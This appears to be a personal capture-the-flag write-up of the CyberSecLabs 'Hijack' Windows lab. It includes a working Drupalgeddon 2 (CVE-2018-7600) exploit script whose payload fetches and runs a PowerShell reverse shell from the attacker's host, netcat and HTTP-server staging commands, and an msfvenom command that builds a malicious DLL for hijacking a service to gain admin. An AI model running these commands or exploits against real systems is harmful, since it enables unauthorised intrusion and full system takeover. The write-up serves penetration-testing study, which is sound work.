CyberSecLabs- Hijack
This is my 11th write up and I will be discussing my experience with the machine “hijack” from CyberSecLabs. CyberSecLabs is a great platform, for people who are starting out with penetration testing and want to sharpen their skills to take on the OSCP. Hijack was a fun Windows box, I learned how to perform DLL Hijacking for the first time. A drupplageddon exploit lands you into user on the box with write access finding a path where DLL Hijacking is possible gaining full admin.
Step 1: Enumeration
I started off with an Nmap scan on this machine to see what ports/versions were exposed and decided there was no need for second scan type. It does not hurt to run two different types of Nmap scans because one scan may give you more than the other. The only time I really run a second scan is when I am not finding anything exploitable from my first results. The scan used default scripts -sC and version detection -sV.
I always start from top to bottom when reading the scan results but in this case port 80 caught my attention with the Drupal service/version exposed. I visited http://172.31.1.27 in my browser.
Step 2: Exploitation
I attempted some directory busting and did not find anything of interest so I proceeded with some googling to see how I can exploit version 8 and came across a manual exploit somebody created. The exploit search had me running in circles for a while because there were mostly unix related exploits. This box is Windows and that is key for getting a successful exploit. I made some minor changes to the exploit script in order for it to work for me.
#!/usr/bin/ python3
import sys import requests ########################################################
# Simple Exploit for CVE 2018-7600 (Drupalgeddon 2)
# Usage: python3 drupalgeddon.py http://target-address ####################################################### target = sys.argv[1] command = '''powershell -c IEX (New-Object Net.WebClient).downloadstring('http:youriphere:8000/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress youriphere -Port 8081''' url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': command } print("Sending Payload...") r = requests.post(url, data=payload) print("Payload Sent.")
I changed the areas in the python script with IP addresses to match my kali box. The next step was to follow exactly what the script is doing and if you look closely it needs to upload the powershell file on to the box along with sending the payload for the exploit. I googled the file the script wants to upload called “Invoke-PowerShellTcp.ps1” and used wget to grab the file and place it in the same directory the script resides in.
I needed to spawn a python simple server to push that file when the script runs along with setting up a netcat listener. Making sure this is all done in the same directory the python exploit script resides.
On my Kali Box same directory as python exploit:
sudo python -m SimpleHTTPServer 8000In another terminal window on kali Box:
This will catch the reverse shell.
sudo nc -lvp 8081In another Terminal Window:
This will kick off the exploit while the other commands above are running in the background.
sudo python3 sinner.py http://172.31.1.27Checking my netcat window I grabbed the reverse connection as user jack.
Step 3: Post Exploitation
First thing I do the minute I land on a box is push some privilege escalation enumeration tools onto the box and see what can lead me to admin. I love to use winPEAS for this so I pushed it to the box following the same method with python simple server in the above commands.
Looking at the results from the winPEAS I noticed some DLL Hijacking possible with some directories not to mention the name of the box rang a bell. This had to be the way to admin. I kind of hate that they do that with some of these boxes, its a dead giveaway!
I have never performed a DLL Hijacking attack before so I definitely had to do some googling to successfully exploit this. The directory where this was possible was also another dead giveaway in the winPEAS results because from doing research on the hijacking attacks it has to do with processes being stopped/started.
It was time to craft a malicious DLL file with msfvenom to replace the one found in the directory \Hijack\Libraries.
On my Kali Box:
msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=4444 -f dll > Custom.dllSuper important that its named with the same filename you found the other .dll with in C:\Program Files\Hijack\Libraries. It will fool the service when running/Stopping giving you a reverse shell. After that I needed to create a listener in metasploit to grab the connection.
sudo msfconsoleuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST youriphereset LPORT 4444run
Pushing the Custom.dll file I created with msfvenom to the box with python simple server inside of the /Libraries directory and it replaced the current Custom.dll with my evil one. I then needed to start the Hijack.exe service in order for it to reach out to the bad .dll file and the hijack to kick off.
net start hijackChecking my metasploit listener I hijacked the connection as full admin ;)
